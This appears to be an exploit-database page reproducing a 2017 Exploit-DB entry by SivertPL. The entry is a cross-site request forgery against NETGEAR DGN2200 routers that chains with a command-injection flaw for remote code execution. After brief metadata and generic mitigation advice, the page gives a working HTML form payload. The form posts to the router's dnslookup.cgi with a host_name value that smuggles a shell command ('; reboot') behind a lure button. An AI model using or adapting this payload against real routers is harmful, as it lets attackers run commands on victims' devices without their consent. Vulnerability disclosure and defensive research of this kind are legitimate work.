header-logo
Suggest Exploit
vendor:
DGN2200
by:
SivertPL
8,8
CVSS
HIGH
CSRF
352
CWE
Product Name: DGN2200
Affected Version From: 10.0.0.20
Affected Version To: 10.0.0.50
Patch Exists: YES
Related CWE: CVE-2017-6366
CPE: h:netgear:dgn2200
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: DGN2200v1,v2,v3,v4
2017

NETGEAR Firmware DGN2200v1/v2/v3/v4 CSRF which leads to RCE through CVE-2017-6334

A quite dangerous CSRF was discovered on all DGN2200 firmwares. When chained with either CVE-2017-6077 or CVE-2017-6334, allows for unauthenticated (sic!) RCE after tricking somebody logged in to the router to view a website.

Mitigation:

Ensure that all users are aware of the risks of clicking on links from untrusted sources. Implement a web application firewall to detect and block malicious requests.
Source

Exploit-DB raw data:

# Exploit Title: NETGEAR Firmware DGN2200v1/v2/v3/v4 CSRF which leads to RCE through CVE-2017-6334
# Date: 2017-02-28
# Exploit Author: SivertPL
# Vendor Homepage: http://netgear.com/
# Software Link: http://www.downloads.netgear.com/files/GDC/DGN2200/DGN2200%20Firmware%20Version%201.0.0.20%20-%20Initial%20Release%20(NA).zip
# Version: 10.0.0.20 (initial) - 10.0.0.50 (latest, still 0-day!)
# Tested on: DGN2200v1,v2,v3,v4

# CVE: CVE-2017-6366

A quite dangerous CSRF was discovered on all DGN2200 firmwares.
When chained with either CVE-2017-6077 or CVE-2017-6334, allows for unauthenticated (sic!) RCE after tricking somebody logged in to the router to view a website.

<!DOCTYPE html>
<html>
	<title>netgear router CSRF</title>
	<body>
		<form method="POST" action="http://192.168.0.1/dnslookup.cgi">
			<input type="hidden" name="host_name" value="www.google.com; reboot"> <!-- CVE-2017-6334 payload -->
			<input type="hidden" name="lookup" value="Lookup">
			<button name="clc" value="clc">Would You Dare To?</button> 
		</form>
	</body>
</html>

<!-- 2017-02-27 by SivertPL -->

Navigation

Suggest Exploit

Services By CQR